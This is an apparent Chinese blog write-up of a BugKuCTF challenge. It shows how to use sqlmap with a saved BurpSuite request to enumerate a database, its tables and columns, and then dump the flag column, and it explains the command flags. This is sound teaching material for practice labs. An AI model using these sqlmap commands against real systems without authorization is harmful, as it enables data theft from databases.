CTF|sqlmap的简单使用

  • 工具 BurpSuite Chrome插件Proxy SwitchyOmega sqlmap
  • 示例:BugKuCTF题 成绩单

初步测试1

BurpSuite开启代理,随意输入一个id,BurpSuite导出为文件
image.png

拿出命令行,准备开撸
命令sqlmap -r 成绩单.txt -p id --current-db 获取当前数据库名称
参数说明

-r   加载一个文件 
-p  指定参数 
--current-db  获取数据库名称
此外
-u   指定url
 --method POST    POST方式,搭配 --data "id=1" 食用  
--cookie "id=1"       带上cookie
-threads                 指定线程数
--dbms                    指定数据库类型
拿到数据库名

命令sqlmap -r 成绩单.txt -p id -D skctf_flag --tables 获取指定数据库的表

-D       指定数据库名称 
--tables    列举数据库中的表

拿到表名

命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g --columns获取指定表的字段

image.png

命令sqlmap -r 成绩单.txt -p id -D skctf_flag -T fl4g -C skctf_flag --dump打印指定字段的内容

image.png

你可能感兴趣的:(CTF|sqlmap的简单使用)